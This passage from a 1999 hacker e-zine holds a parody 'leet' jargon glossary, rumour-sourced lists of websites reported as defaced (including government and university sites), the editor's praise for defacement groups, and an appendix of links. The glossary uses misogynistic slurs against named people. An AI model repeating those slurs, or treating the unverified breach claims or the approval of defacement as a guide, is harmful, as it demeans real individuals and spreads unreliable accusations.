Superhighway with filthy swear words," said former Vice President Al Gore, founder of the Internet, before he
suddenly toppled over and dumped core. "NTLDR not found. INVALID_BOOT_DEVICE in kernel32.exe
006383dhX00029393."
Posted on Fri 26 Mar 00:21:38 1999 GMT
Written by Potato <meersan@linuxmail.org>
-----------------------------/-----------------------------
You have to learn the lingo to become 31337
AOL - The best isp in the world. All of the real hax0rs use it.
bot - ereet program to 0wn you irc channel for you while you are gone, Curt is the god of bots
chix0rs - girlies that hax0rs will never get because they ph33r them too much.
ftp - k-rad hax0ring utility used to get passwd files and warez.(if the passwd file is shadow, make sure you get on irc and ask
everyone how to unshadow it.)
hax0r - Someone that punts, nukes, mailbombs, and 0wns everyone else and tells them that repeatedly.
IRC - The place where lamers go to chat. The lamest channels are #2600, #hack, #phreak, #hackphreak, etc. The only k-cool
channels are #bastards on effnet, #warez, and #gaycartoonsex.
lame - stupid, not leet, suck ass, "emmanuel goldstein is lame"
leet - (elite, eleet, 1337, 31337 etc.)good, cool , k-rad, "Cochise is leet"
Linux - The OS that lamers that think they are hax0rs use.
Microsoft Unix 98 - The super k-rad OS that every real hax0r uses.
progs - Tools that every hax0r must have for punting, mailbombing, scrolling, etc.
pr0n - pictures of nekkid chix0rs. (note: this is as close to a chix0r a hax0r will ever get.)
skilless whore - a stupid bitchx0r that thinks she knows everything, but doesnt know anything. "Orin and Annie are skilless
whores"
Warez - K-rad pirated software that every hax0r must trade.
http://neatoelito.org/hax0ring/jargon.html
- submitted by A.Silliman
@HWA
SITE.1
@HWA
H.W Hacked websites
~~~~~~~~~~~~~~~~
Note: The hacked site reports stay, especially with some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
* Hackers Against Racist Propaganda (See issue #7)
Haven't heard from Catharsys in a while for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...
Looks like things are quieter than normal perhaps with all the FBI action thats
going down and groups getting raided some people are becoming a little antsy,
well heres the list for this week according to HNN...
From HNN rumours section, http://www.hackernews.com/
May 24th
contributed by Anonymous
Cracked
It has been a busy weekend for some people. These are
the sites that have been reported to HNN as cracked.
Please remember that this is the rumours section. While
most of these are verified we can't verify them all.
http://www.elitehackers1.net
http://www.ruckstuhlgaragen.ch
http://www.gibson.com
http://www.e.gov
http://www.ebuy.gov
http://codesign.scu.edu
http://www.castnetcom.com
http://plan.arch.usyd.edu.au
http://www.4women.gov
http://www.clic.nl
http://www.etnews.co.kr
http://www.hackvp.net
http://eval1.oit.unc.edu
http://elkriver.k12.mn.us
http://jutr.gov.my
http://nc-101.hypermart.net
http://www.barekids.com
http://www.holsey.com
http://www.team-liquid.com
http://www.metro.seoul.kr
http://learnweb.harvard.edu
http://ngpsun.ngpc.state.ne.us
http://www.buscominc.com
http://www.columbuslumber.com
http://www.cpavision.org
http://www.elitexposure.com
http://www.superiortours.com
May 27th
From HNN rumours section;
contributed by Anonymous
Cracked
These are the sites that have been reported to us as
cracked.
http://do-nt.8j.net-2
http://data.digex.net
http://nation.com.pk
http://www.pak.gov.pk
http://www.the-dark-immortals.org
May 28th
From HNN rumours section;
contributed by Anonymous
Cracked
The following websites have been reported as cracked
http://info2.cs-snd.com.cn
http://mmic.snu.ac.kr
http://vunews.vanderbilt.edu
http://wfserverb.weifang.gov.cn
http://www.abatelli.com
http://www.brain3.com
http://www.bringardner.com
http://www.century21rustic.com
http://www.cookpony.com
http://www.craftsmenhomes.com
http://www.devlin-mcniff.com
http://www.dunemere.com
http://www.firsttowne.com
http://www.hampton.net
http://www.hanfra.com
http://www.lambagency.com
http://www.mainstproperties.com
http://www.makah.org
http://www.montauk.net
http://www.morleyagency.com
http://www.moviespotlight.com
http://www.warez-city.cx
http://www.bobhowardnissan.com
http://www.cns.state.va.us
http://www.senate.gov
-------------------------------------------------------------------------
A.0 APPENDICES
_________________________________________________________________________
A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
<a href="http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html">hack-faq</a>
Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
<a href="http://www.lysator.liu.se/hackdict/split2/main_index.html">Original jargon file</a>
New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/
<a href="http://www.tuxedo.org/~esr/jargon/">New jargon file</a>
HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.genocide2600.com/~tattooman/zines/hwahaxornews/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondants and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed
Belgium.......: http://bewoner.dma.be/cum/
<a href="http://bewoner.dma.be/cum/">Go there</a>
Brasil........: http://www.psynet.net/ka0z
<a href="http://www.psynet.net/ka0z/">Go there</a>
http://www.elementais.cjb.net
<a href="http://www.elementais.cjb.net/">Go there</a>
Columbia......: http://www.cascabel.8m.com
<a href="http://www.cascabel.8m.com/">Go there</a>
http://www.intrusos.cjb.net
<a href="http://www.intrusos.cjb.net">Go there</a>
Indonesia.....: http://www.k-elektronik.org/index2.html
<a href="http://www.k-elektronik.org/index2.html">Go there</a>
http://members.xoom.com/neblonica/
<a href="http://members.xoom.com/neblonica/">Go there</a>
http://hackerlink.or.id/
<a href="http://hackerlink.or.id/">Go there</a>
Netherlands...: http://security.pine.nl/
<a href="http://security.pine.nl/">Go there</a>
Russia........: http://www.tsu.ru/~eugene/
<a href="http://www.tsu.ru/~eugene/">Go there</a>
Singapore.....: http://www.icepoint.com
<a href="http://www.icepoint.com">Go there</a>
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.
<a href="http://www.trscene.org/">Go there</a>
Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.
@HWA
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]
